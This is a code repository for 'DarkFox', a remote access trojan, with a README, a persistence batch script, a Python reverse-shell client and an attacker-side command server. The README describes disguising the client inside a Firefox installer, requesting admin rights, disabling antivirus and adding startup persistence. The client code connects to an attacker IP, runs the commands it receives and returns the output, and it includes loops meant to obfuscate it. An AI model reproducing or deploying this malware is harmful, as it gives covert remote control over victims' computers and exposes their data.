├── Firefox Installer.exe ├── Firefox.ico ├── README.md ├── README.txt ├── antivirus.bat ├── antivirus.exe ├── client.py └── server.py /Firefox Installer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/Firefox Installer.exe -------------------------------------------------------------------------------- /Firefox.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/Firefox.ico -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DarkFox 2 | 3 | Remote access trojan created using WinRar with an installer (ex. firefox) and python Reverse Shell embedded. 4 | 5 | - Edit the client.py file by setting IP and port of the attacking Server listening and IP and port of any proxy present in the attack machine.If there is not a proxy comment the relative section. 6 | 7 | - Transform the client.py into exe, i used pyinstaller: pyinstaller -w -i "Firefox.ico" -F client.py. -w optione allow to create a windowsless .exe, -F optione allow to create only one file. 8 | 9 | - Create self-extracting ZIP with wirrar selecting three file: a benevolant installer (ex: "firefox installer.exe"), client.exe and antivirus.exe. 10 | In the settings of the self-extracting module, set the order of execution of the files, as first the benevolent installer and as the second the client.exe; select the checkbox to extract the files into a temporary folder or if you want to be more malicious specify the folder of the files that will be launched at the boot (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). 11 | Always in the settings of the self-extracting module select request access with administrative rights. 12 | The file antivirus.exe is a windowsless .exe that disable the antivirus. It will be launched by client.exe before connecting to the server. 13 | 14 | - The antivirus.bat file contains the code of the homonymous .exe file and anotother optional feature. 15 | I used "Slimm bat to exe.exe" to convert the .bat file into a windowsless .exe file 16 | 17 | Enjoy :) 18 | -------------------------------------------------------------------------------- /README.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/README.txt -------------------------------------------------------------------------------- /antivirus.bat: -------------------------------------------------------------------------------- 1 | :: Shut down the antivirus 2 | ::cd "C:\Program Files (x86)\AntivirusXXX\AntivirusXXX" 3 | ::XXX.exe -stop 4 | 5 | 6 | :: If was not specified the startup folder in the self extracting moudul settings as the extraction folder, it is possible to add the client.exe among the programs launched at startup only adding a regisrty key. 7 | :: In this case C:\bin\client.exe is the path where it was extracted our malware 8 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Installware 9 | if %errorlevel% NEQ 0 ( 10 | reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Installware /d C:\bin\client.exe 11 | ) 12 | -------------------------------------------------------------------------------- /antivirus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/federicochieregato/DarkFox/2f6c073562d9b2716257728cc6510352dd718204/antivirus.exe -------------------------------------------------------------------------------- /client.py: -------------------------------------------------------------------------------- 1 | #This script run in the victim PC 2 | import socket 3 | import os 4 | import subprocess 5 | import socks 6 | 7 | #Set the IP and the port of the listening server 8 | target_host = "192.168.56.1" 9 | target_port = 443 10 | #This variable and the cycle for present in the code are unnecessary, are used only to obfuscate the code 11 | socketON = 0 12 | connectON = 0 13 | closeON = 0 14 | 15 | #subprocess.call("antivirus.exe") #we launch the exe file that shut down the antivirus. 16 | 17 | for n in range(100): 18 | if socketON == 0: 19 | client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #If there is not a proxy uncomment this part. 20 | #client = socks.socksocket(socket.AF_INET,socket.SOCK_STREAM) #if there is a proxy server, must be configured. 21 | #client.set_proxy(socks.HTTP, "localhost", 3128) 22 | 23 | print("Socket created") 24 | socketON = 1 25 | 26 | for n in range(100): 27 | if connectON == 0: 28 | client.connect((target_host,target_port)) 29 | print("Connection established") 30 | connectON = 1 31 | #We receive the command in data object decode it to string and check if it is equal to “cd”, We do this to check cd command executed correctly because cd command doesn’t have an output to send us back. To change directory we use os.chdir. 32 | #For the other commands we directly open a process and give the decoded string, SHELL should be FALSE if you don’t want a shell to open on client’s machine, we are piping out the stdout, stderr and stdin. We read the piped bytes into output_bytes, convert it to string and send it across the connection along with current working directory(cwd) using client.send(). we close the connection when while loop breaks. 33 | while True: 34 | for n in range(1000): 35 | data = client.recv(1024).decode("utf-8") 36 | break 37 | if data[:2] == 'cd': 38 | for n in range(1000): 39 | os.chdir(data[3:]) 40 | break 41 | if len(data) > 0: 42 | for n in range(1000): 43 | cmd = subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE ) 44 | output_bytes = cmd.stdout.read() 45 | output_str = str(output_bytes, "ISO-8859-1") 46 | client.send(str.encode(output_str + str(os.getcwd()) + '$')) 47 | break 48 | #print(output_str) 49 | 50 | for n in range(100): 51 | if closeON == 0: 52 | client.close() 53 | closeON = 1 54 | break -------------------------------------------------------------------------------- /server.py: -------------------------------------------------------------------------------- 1 | #This script run in the attacker PC 2 | import socket 3 | import threading 4 | import os 5 | import sys 6 | 7 | 8 | #we are defining a function send_commands this takes in a socket object. If the user input is “quit” we close the connection and exit . We encode the command and send it across the connection(conn.send). We receive the data and make it readable by converting it to a string with “utf-8”. We print the response and add (end=“\n”) to move the cursor to a new line so as to enter the next command. 9 | def send_commands(conn): 10 | while True: 11 | print("enter the commands below\n") 12 | cmd = input() 13 | if cmd == 'quit': 14 | conn.close() 15 | server.close() 16 | sys.exit() 17 | if len(str.encode(cmd)) > 0: 18 | conn.send(str.encode(cmd)) 19 | client_response = str(conn.recv(4096), "utf-8") #reception buffer set to 4 MB; if the client's response is larger, it must be increased. 20 | print(client_response, end="\n") 21 | 22 | #we are setting bind_ip and port for attacker to enter usually his own IP, port is set to 443(can be changed) 23 | bind_ip = '' 24 | bind_port = 443 25 | serv_add = (bind_ip , bind_port) 26 | 27 | #we are creating a socket object, I have used TCP (socket.AF_INET,socket.SOCK_STREAM) then we are binding it to the server address, we listen for any connection with a time delay of 5 seconds. 28 | #The cycle for are unnecessary; are used only to obfuscate the code 29 | 30 | server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 31 | server.bind((serv_add)) 32 | server.listen(5) 33 | 34 | print ("[*] listening on {}:{}".format(bind_ip,bind_port)) 35 | 36 | #after a successful connection we accept the connection using server.accept() this returns client IP(addr[0]), port(addr[1]) and a new connected socket(conn). We print out the details and ask for commands to be executed. 37 | conn,addr = server.accept() 38 | 39 | print('accepted connection from {} and port {}'.format(addr[0],addr[1])) 40 | 41 | send_commands(conn) 42 | 43 | conn.close() --------------------------------------------------------------------------------